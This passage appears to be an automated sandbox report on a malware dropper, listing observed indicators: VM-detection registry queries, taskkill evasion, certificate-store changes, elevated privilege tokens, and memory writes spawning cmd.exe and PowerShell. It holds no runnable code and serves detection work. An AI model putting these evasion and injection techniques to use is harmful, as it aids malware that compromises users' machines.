Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331518534095" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4844 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 764 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3368 wrote to memory of 2452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
